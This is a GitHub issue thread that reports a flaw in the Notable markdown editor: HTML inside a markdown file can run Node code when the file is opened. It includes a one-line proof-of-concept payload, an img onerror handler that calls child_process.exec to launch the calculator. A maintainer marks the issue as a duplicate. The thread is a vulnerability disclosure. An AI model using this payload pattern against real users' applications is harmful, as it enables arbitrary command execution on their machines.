### ISSUE TITLE
System command execution may occur when opening a file

### ISSUE THREAD

**Issue by HardT0Name** [notable/notable#507]
- **Windows10**:
- **v1.3.0**:

### Current behavior
When opening an md file with html code, it may cause code execution and even execute system commands.

payload: 
```
<img src=# onerror="require('child_process').exec('calc')">
```
![image](https://user-images.githubusercontent.com/33834823/53684972-59370700-3d4f-11e9-9d50-d34e27cfa31e.png)

[2.zip](https://github.com/notable/notable/files/2922320/2.zip)

### Expected behavior
The DOM should be rendered normally but the code in the content should not be executed

**Comment by fabiospampinato** [comment]
Duplicate of #362.
